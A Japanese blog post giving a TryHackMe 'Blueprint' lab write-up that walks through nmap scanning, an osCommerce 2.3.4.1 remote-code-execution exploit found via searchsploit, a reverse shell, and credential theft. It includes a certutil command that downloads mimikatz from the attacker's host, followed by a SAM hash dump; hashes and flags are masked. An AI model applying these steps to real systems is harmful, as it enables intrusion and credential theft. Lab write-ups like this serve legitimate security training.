はまやんはまやんはまやん

hamayanhamayan's blog

Blueprint 解説 (Writeup) [TryHackMe]

f:id:hamayanhamayan:20210530113922p:plain

一部を■で隠しています。

nmapしよう

80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
445/tcp   open  microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql        MariaDB (unauthorized)
8080/tcp  open  http         Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC

いっぱいある。
httpが2つあるので探索してみると、:8080/oscommerce-2.3.4/にてE-commerceのサイトが立ち上がっていることが分かる。
脆弱性を探してみよう。

oscommerce

$ searchsploit oscommerce
---------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title                                                                                                                                                  |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------
osCommerce 2.3.4.1 - Remote Code Execution                                                                                                                      | php/webapps/44374.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results
Papers: No Results

searchsploitで検索して見てみるとRCEできるものが1つある。
これは使えそう。

$ searchsploit -p 44374
  Exploit: osCommerce 2.3.4.1 - Remote Code Execution        
      URL: https://www.exploit-db.com/exploits/44374
     Path: /usr/share/exploitdb/exploits/php/webapps/44374.py
File Type: ASCII text, with CRLF line terminators

$ cp /usr/share/exploitdb/exploits/php/webapps/44374.py 44374.py

使用する際はexploitコードのURLと実行したいPHPコードを変えて動かそう。
system("whoami");とするとWarning: system() has been disabled for security reasons in C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\includes\configure.php on line 27といわれてしまう。
ok. phpinfo();を動かしてみよう。
disable_functions | system

リバースシェルを試していこう…
いこう…

解説を見る

どれを使っても刺さらないし、Metasploitはあんまり入れたくないしで、一旦解説見た。
書いてあったものを一通り試したがダメか…
Metasploit入れるか…

Metasploitでリバースシェルする

THM write-up: Blueprint | Planet DesKelの通りやったんだけど、meterpreter起動まで至らなかった。
とりあえずリバースシェルまで行けたので、このままやることにする。

mimikatz

mimikatzを使って認証情報を得ることにする。

C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\includes>systeminfo
System Type:               X86-based PC

32bitで動いているみたい。32bitのmimikatz.exeを手元に用意して、python -m http.server 80でウェブサーバを起動して持って来よう。

C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\includes>certutil -urlcache -f http://[yourip]/mimikatz.exe mimikatz.exe

C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\includes>mimikatz.exe
mimikatz.exe

  .#####.   mimikatz 2.2.0 (x86) #19041 May 29 2021 13:23:14
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # lsadump::sam
RID  : 000003e8 (1000)
User : Lab
  Hash NTLM: ■■■■■■■■■■■■■■■■■■■■

Labのハッシュが手に入る。CrackStationで検索すると答えが見つかる。

root.txt

AdminのDesktopによく置いてあるので、とりあえずそこを探すとあって、なぜか読める。

C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\includes>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 14AF-C52C

 Directory of C:\Users\Administrator\Desktop

11/27/2019  07:15 PM    <DIR>          .
11/27/2019  07:15 PM    <DIR>          ..
11/27/2019  07:15 PM                37 root.txt.txt
               1 File(s)             37 bytes
               2 Dir(s)  19,504,631,808 bytes free

C:\Users\Administrator\Desktop>more root.txt.txt
more root.txt.txt
■■■■■■■■■■■■■■■■■■■■■■■■■■